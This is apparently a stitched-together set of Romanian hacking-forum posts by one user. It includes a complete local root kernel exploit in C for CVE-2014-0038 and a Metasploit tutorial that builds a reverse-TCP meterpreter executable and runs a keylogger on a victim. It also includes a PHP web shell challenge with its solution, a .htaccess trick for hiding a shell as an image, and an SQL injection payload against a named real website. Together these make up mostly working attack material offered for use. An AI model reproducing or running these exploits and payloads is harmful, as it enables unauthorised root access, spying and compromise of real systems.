Shelo

/* * Local root exploit for CVE-2014-0038. * * https://raw.github.com/saelo/cve-2014-0038/master/timeoutpwn.c * * Bug: The X86_X32 recvmmsg syscall does not properly sanitize the timeout pointer * passed from userspace. * * Exploit primitive: Pass a pointer to a kernel address as timeout for recvmmsg, * if the original byte at that address is known it can be overwritten * with known data. * If the least significant byte is 0xff, waiting 255 seconds will turn it into a 0x00. * * Restrictions: The first long at the passed address (tv_sec) has to be positive * and the second long (tv_nsec) has to be smaller than 1000000000. * * Overview: Target the release function pointer of the ptmx_fops structure located in * non initialized (and thus writable) kernel memory. Zero out the three most * significant bytes and thus turn it into a pointer to an address mappable in * user space. * The release pointer is used as it is followed by 16 0x00 bytes (so the tv_nsec * is valid). * Open /dev/ptmx, close it and enjoy. * * Not very beautiful but should be fairly reliable if symbols can be resolved. * * Tested on Ubuntu 13.10 * * gcc timeoutpwn.c -o pwn && ./pwn * * Written by saelo */ #define _GNU_SOURCE #include <netinet/ip.h> #include <stdio.h> #include <stdlib.h> #include <time.h> #include <string.h> #include <unistd.h> #include <fcntl.h> #include <sys/socket.h> #include <sys/stat.h> #include <sys/syscall.h> #include <sys/wait.h> #include <sys/mman.h> #define __X32_SYSCALL_BIT 0x40000000 #undef __NR_recvmmsg #define __NR_recvmmsg (__X32_SYSCALL_BIT + 537) #define BUFSIZE 200 #define PAYLOADSIZE 0x2000 #define FOPS_RELEASE_OFFSET 13*8 /* * Adapt these addresses for your need. * see /boot/System.map* or /proc/kallsyms * These are the offsets from ubuntu 3.11.0-12-generic. */ #define PTMX_FOPS 0xffffffff81fb30c0LL #define TTY_RELEASE 0xffffffff8142fec0LL #define COMMIT_CREDS 0xffffffff8108ad40LL #define PREPARE_KERNEL_CRED 0xffffffff8108b010LL typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred); typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred); /* * Match signature of int release(struct inode*, struct file*). * * See here: http://grsecurity.net/~spender/exploits/enlightenment.tgz */ int __attribute__((regparm(3))) kernel_payload(void* foo, void* bar) { _commit_creds commit_creds = (_commit_creds)COMMIT_CREDS; _prepare_kernel_cred prepare_kernel_cred = (_prepare_kernel_cred)PREPARE_KERNEL_CRED; *((int*)(PTMX_FOPS + FOPS_RELEASE_OFFSET + 4)) = -1; // restore pointer commit_creds(prepare_kernel_cred(0)); return -1; } /* * Write a zero to the byte at then given address. * Only works if the current value is 0xff. */ void zero_out(long addr) { int sockfd, retval, port, pid, i; struct sockaddr_in sa; char buf[BUFSIZE]; struct mmsghdr msgs; struct iovec iovecs; srand(time(NULL)); port = 1024 + (rand() % (0x10000 - 1024)); sockfd = socket(AF_INET, SOCK_DGRAM, 0); if (sockfd == -1) { perror("socket()"); exit(EXIT_FAILURE); } sa.sin_family = AF_INET; sa.sin_addr.s_addr = htonl(INADDR_LOOPBACK); sa.sin_port = htons(port); if (bind(sockfd, (struct sockaddr *) &sa, sizeof(sa)) == -1) { perror("bind()"); exit(EXIT_FAILURE); } memset(&msgs, 0, sizeof(msgs)); iovecs.iov_base = buf; iovecs.iov_len = BUFSIZE; msgs.msg_hdr.msg_iov = &iovecs; msgs.msg_hdr.msg_iovlen = 1; /* * start a seperate process to send a udp message after 255 seconds so the syscall returns, * but not after updating the timout struct and writing the remaining time into it. * 0xff - 255 seconds = 0x00 */ printf("clearing byte at 0x%lx\n", addr); pid = fork(); if (pid == 0) { memset(buf, 0x41, BUFSIZE); if ((sockfd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) == -1) { perror("socket()"); exit(EXIT_FAILURE); } sa.sin_family = AF_INET; sa.sin_addr.s_addr = htonl(INADDR_LOOPBACK); sa.sin_port = htons(port); printf("waiting 255 seconds...\n"); for (i = 0; i < 255; i++) { if (i % 10 == 0) printf("%is/255s\n", i); sleep(1); } printf("waking up parent...\n"); sendto(sockfd, buf, BUFSIZE, 0, &sa, sizeof(sa)); exit(EXIT_SUCCESS); } else if (pid > 0) { retval = syscall(__NR_recvmmsg, sockfd, &msgs, 1, 0, (void*)addr); if (retval == -1) { printf("address can't be written to, not a valid timespec struct\n"); exit(EXIT_FAILURE); } waitpid(pid, 0, 0); printf("byte zeroed out\n"); } else { perror("fork()"); exit(EXIT_FAILURE); } } int main(int argc, char** argv) { long code, target; int pwn; /* Prepare payload... */ printf("preparing payload buffer...\n"); code = (long)mmap((void*)(TTY_RELEASE & 0x000000fffffff000LL), PAYLOADSIZE, 7, 0x32, 0, 0); memset((void*)code, 0x90, PAYLOADSIZE); code += PAYLOADSIZE - 1024; memcpy((void*)code, &kernel_payload, 1024); /* * Now clear the three most significant bytes of the fops pointer * to the release function. * This will make it point into the memory region mapped above. */ printf("changing kernel pointer to point into controlled buffer...\n"); target = PTMX_FOPS + FOPS_RELEASE_OFFSET; zero_out(target + 7); zero_out(target + 6); zero_out(target + 5); /* ... and trigger. */ printf("releasing file descriptor to call manipulated pointer in kernel mode...\n"); pwn = open("/dev/ptmx", 'r'); close(pwn); if (getuid() != 0) { printf("failed to get root \n"); exit(EXIT_FAILURE); } printf("got root, enjoy \n"); return execl("/bin/bash", "-sh", NULL); } Source: http://www.exploit-db.com/exploits/31346/

ON: Nenea Nytro este administratorul forumului. OFF: Tu in poza aceia erai ala ce le fura bulanele la politai ?

ON: Un nenea OFF: SRI, esti si tu in poza asta?

Stai linistit.

Ma bucur ca ai observat , pot sa dau vina pe tastatura ?

Daca faci syntaxele cum vorbesti limba romana ... trebuie sa verifici din nou! Ti-am dat pm Te-am dat pm..

M-am uitat si eu la tot videoclipul , foarte interesant . Inarmat cu o tastatura , un mause , un havij , iti bag site-ul in tufis )

SQL = SQL - Wikipedia SQLI = SQL injection - Wikipedia, the free encyclopedia

Note: This is an advance topic.Read Carefully. Feel free to ask any kind of queries . We are always here to help you. If you are really interested in network security, chances are you must have heard of the Metasploit over the last few years. Now, have you ever wondered what someone can do to your PC, by just knowing your IP. Here's the answer. He could 0wN you, or in other words , he could have full access to your PC provided you have just a few security loopholes which may arise cause of even a simple reason like not updating your Flash player last week, when it prompted you to do so. Metasploit is a hacker's best friend, mainly cause it makes the job of exploitation and post-exploitation a lot easier compared to other traditional methods of hacking. The topic Metasploit is very vast in itself.However, i'll try keeping it basic and simple so that it could be understood by everyone here. Also, Metasploit can be used with several other tools such as NMap or Nessus (all these tools are present in Backtrack ). In this tutorial, i'll be teaching you how to exploit a system using a meterpreter payload and start a keylogger on the victim's machine. Hacking through Metasploit is done in 3 simple steps: Point, Click, 0wn. Before I go into the details of The Metasploit Framework, let me give you a little idea of some basic terms (may seem boring at first, but you must be knowing them) Vulnerability: A flaw or weakness in system security procedures, design or implementation that could be exploited resulting in notable damage. Exploit: A piece of software that take advantage of a bug or vulnerability, leading to privilege escalation or DoS attacks on the target. Overflow: Error caused when a program tries to store data beyond its size. Maybe used by an attacker to execute malicious codes. Payload: Actual code which runs on the compromised system after exploitation Now, what Metasploit IS? It is an open source penetration testing framework, used for developing and executing attacks against target systems. It has a huge database of exploits, also it can be used to write our own 0-day exploits. METASPLOIT ANTI FORENSICS: Metasploit has a great collection of tools for anti forensics, making the forensic analysis of the compromised computer little difficult. They are released as a part ofMAFIA(Metasploit Anti Forensic Investigation Arsenal). Some of the tools included are Timestomp, Slacker, Sam Juicer, Transmogrify. Metasploit comes in the following versions: 1. CLI (Command Line Interface) 2. Web Interface 3. MSF Console 4. MSFwx 5. MSFAPI I would recommend using the MSF Console because of its effectiveness & powerful from a pentester’s P0V. Another advantage of this mode is, several sessions of msfconsole could be run simultaneously. I would recommend you doing the following things in Metasploit, on a Backtrack(system or image), avoiding the windows version of the tool. For those of all who don't know, Backtrack is a linux distro especially for security personals, including all the tools required by a pentester. Download Backtrack from here. You can download the ISO or VMware image, according to the one you're comfortable with. If you have 2 access to more than 1 system physically, then go for the ISO image and install it on your hard disk. Let the Hacking Begin Open up backtrack. You should have a screen similar to this. The default login credentials are: Username: root Pass: toor Type in root@bt:~#/etc/init.d/wicd start to start the wicd manager Finally, type "startx" to start the GUI mode: root@bt:~#startx First of all, know your Local Ip. Opening up a konsole (on the bottom left of taskbar) and typing in: root@bt:~#ifconfig It would be something like 192.168.x.x or 10.x.x.x. Have a note of it. Now, Launch msfconsole by going to Applications>>Backtrack>>Metasploit Engineering Framework>>Framework Version 3>>msfconsole You should now be having a shell something similar to a command prompt in windows. msf > Let’s now create an executable file which establishes a remote connection between the victim and us, using the meterpreter payload. Open another shell window (”Session>>New Shell” or click on the small icon on the left of the shell tab in the bottom left corner of the window) root@bt:/opt/metasploit3/msf3# ./msfpayload windows/meterpreter/reverse_tcp LHOST=”your local ip” LPORT=”any port you wish” x > /root/reverse_tcp.exe Your local IP is the one you noted earlier and for port you could select 4444. (Everything has to be entered without quotes) You should get something like this: Created by msfpayload (http://www.metasploit.com). Payload: windows/meterpreter/reverse_tcp Length: 290 Options: LHOST=192.168.255.130,LPORT=4444 root@bt:/opt/metasploit3/msf3# Also, now on your backtrack desktop, you would be seeing a reverse_tcp.exe file. Migrate it to your other computer in the same local network using a thumb drive or by uploading it online. Now open the 1st shell window with msfconsole in it. msf > Type the following: msf > use exploit/multi/handler msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp msf exploit(handler) > set LHOST 192.168.255.130 LHOST => 192.168.255.130 msf exploit(handler) > set LPORT 4444 LPORT => 4444 All the connections are done. You have already made an executable file which makes a reverse connection to you. And now, you have set the meterpreter to listen to you on port 4444. The last step you have to do now, is to type in “exploit” and press enter, msf exploit(handler) > exploit [*] Started reverse handler on 192.168.255.130:4444 [*] Starting the payload handler... Now, the payload is listening for all the incoming connections on port 444. [*] Sending stage (749056 bytes) to 192.168.255.1 [*] Meterpreter session 1 opened (192.168.255.130:4444 -> 192.168.255.1:62853) at Sun Mar 13 11:32:12 -0400 2011 You would see a meterpreter prompt like this meterpreter > Type in ps to list the active processes meterpreter > ps Search for explorer.exe and migrate to the process meterpreter > migrate 5716 [*] Migrating to 5716... [*] Migration completed successfully. meterpreter > Type in the following: meterpreter > use priv Now, if you want to start the Keylogger activity on victim, just type keyscan_start Now, if you want to go to the victim’s computer, Jus type shell meterpreter > shell Process 5428 created. Channel 1 created. Microsoft Windows [Version 6.1.7600] Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:\Windows\system32> http://2.bp.blogspot.com/-W35Nm_QuEKM/TX-wtwNlscI/AAAAAAAAAnY/4LrDo4wqOMg/s1600/shell.JPG[/IMG] [IMG]Let’s suppose you want to start a notepad on the victim’s computer. Type in: Let’s say the victim has typed in anything on his computer. Just type exit, to return to meterpreter. Now type in keyscan_dump, to see all the typed keystrokes : meterpreter > keyscan_dump Dumping captured keystrokes... Sursa: Metasploit Tutorial - With an example | Exploiting the vulnerabilities| Ethical Hacking Tutorials | How to hack

1 minut 38 secunde.

Haide sa vedem. puteti sa imi trimiteti si cateva linkuri daca se poate

Urcand shell prin noroc chior

Lasa-mi pm cu rezolvarea este ok si asa.

Nu vad ca ai reusit sa treci challange-ul.

Trebuie sa exploatati un script php. 1) Determinati ce vulnerabilitate are 2) Exploatati vulnerabilitatea 3) Urcati shell si puneti-va numele pe index ! Target: http://188.212.103.11/ Raspunsul se da pe privat . Cei care au rezolvat ! - yo20063 - danyweb09 - Roby4kill - florin_darck - askwrite Rezolvare: # paramentru infectat este "RCE" Remote Code Execution # Encriptia care ati gasito voi in comentarii era Korex [url=http://crypo.in.ua/tools/eng_korex-3s.php]Aici[/url] se poate decripta ! # Dupa decriptarea mesajului aveati urmatorul rezultat "rst.php?=" Acesta este parametru. # Executati comanda "echo nume" si gata. # Ca sa urcati shell trebuia sa gasiti un fisier fara permisiuni si folosindu-va de functii PHP urcati shelul in fisier txt transformand acest RCE in RFI. Script Scriptul folosit de mine este foarte simplu . echo system($_GET['rst']); ?> <html> <body> <center><h1><b>Exploateaza acest script</b></h1></center> <!-- ? ? ? ? ? ? ? ? ? ? HIT: Un korean criptograf a fost foarte inteligent. --> <?php Multumiri Multumesc tuturor care au facut acest challange. Nivelul a fost mediu-hard. # yo20063 # danyweb09 # Roby4kill # florin_darck # askwrite Topic Inchis Acest topic a fost inchis , orice replay sau PM nu este luat in considerare !

Va rog sa ma ajutati care puteti

Eu am incercat pe mai multe servere si a functionat metoda , multumesc pentru atragerea atentiei o sa ma gandesc si la alte metode.

Am vazut un tutorial acum 2 zile care era cum sa-ti ascunzi shelul de administrator Mi-a venit o ideie cum shelul tau sa fie .gif s-au .jpg in fine sa fie confundat cu o imagine de catre administrator si chiar daca til sterge si urci shelul .jpg / .gif / .png sa til interpreteze serverul ca shell nu ca imagine. Pasul 1 Faci un fisier .htaccess care sa aiba urmatoarea linie de cod AddType application/x-httpd-php .gif Pasul 2 Schimbi extensia la shell in .gif Indicat sa il urcati intr-un folder unde sunt foarte multe poze ! Print Screen

Nu inteleg ce challange e asta..

Pun si eu Syntaxa mea http://www.yourtrainer.com.cy/en/more2.php?id=-2 /*!17533UnIOn*/%0A/*!17533SeLEcT*/1,/*!40000CoNCaT*/(0x3c7363726970743e616c6572742822,0x56657273696f6e3a20,version(),0x5c6e,0x44617461626173653a20,database(),0x5c6e,0x4e756d653a205368656c6f,0x22293c2f7363726970743e),3,4,5,6,7--

Uite-ti prietenii

Am si necenzurata dar am pus si link-ul parametrului vulnerabil mai sus

Inca nu am primit nici un mail , dar astept cu sufletul la gura